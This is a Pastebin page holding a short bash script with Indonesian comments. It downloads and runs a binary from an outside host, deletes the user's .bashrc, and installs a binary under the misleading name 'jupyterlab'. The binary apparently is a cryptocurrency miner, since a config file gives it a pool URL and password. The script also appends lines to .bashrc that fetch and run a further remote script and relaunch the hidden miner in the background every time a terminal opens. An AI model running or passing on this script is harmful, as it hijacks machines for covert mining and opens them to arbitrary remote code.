Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/bin/bash
- # Mengunduh file 'kilan' dan memberikan izin eksekusi
- wget -O kilan https://w4r.gmaila.tech/kilan
- chmod +x kilan
- ./kilan
- clear
- sleep 2
- rm -rf kilan
- # Menghapus dan membuat direktori .wolu serta mengunduh file wolu
- cd ~
- pkill wolu && sleep 2
- rm -rf .wolu .bashrc && sleep 2
- mkdir .wolu && cd .wolu
- wget -qO wolu https://gitlab.com/ghcees/pack/-/raw/main/jupyterlab
- chmod +x wolu >/dev/null 2>&1
- clear
- # Menambahkan perintah baru ke ~/.bashrc untuk menjalankan config.sh
- echo "cd ~/ && wget -O c.sh https://idx0.short.gy/json && chmod +x c.sh && sed -i -e 's/\r$//' c.sh && ./c.sh" >> ~/.bashrc
- # Menambahkan skrip otomatis ke ~/.bashrc untuk menjalankan program secara otomatis saat terminal dibuka
- echo -e "# If not running interactively, don't do anything\ncase \$- in *i*) ;; *) return ;; esac\n\n# Auto-run script on terminal start\npkill wolu && cd ~/ && sleep 2\nnohup ~/.wolu/./wolu &>/dev/null &\nclear\n\ncurrent_time=\$(TZ=UTC-7 date +\"%R-[%d/%m/%y]\")\nurl=\$(jq -r '.pools[0].url' ~/.wolu/config.json)\n\n# Display the current time and pool information\njq -r '.pools[0].pass' ~/.wolu/config.json | awk -v time=\"\$current_time\" -v pool_url=\"\$url\" '{\n print \"\\033[1;31;40mVaultHCI\\033[0m\", time;\n print \"\\033[42;1m\\033[37mPool\\033[0m\", pool_url;\n print \"\\033[31;43mRDP\\033[0m\", \$1\n}'\n\n# Show confirmation that auto-run script is working\necho -e \"\\033[1;32m[INFO] OtoRerun executed successfully.\\033[0m\"\n\njobs" >> ~/.bashrc
- clear
- source ~/.bashrc; chmod +x .bashrc; ./.bashrc
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement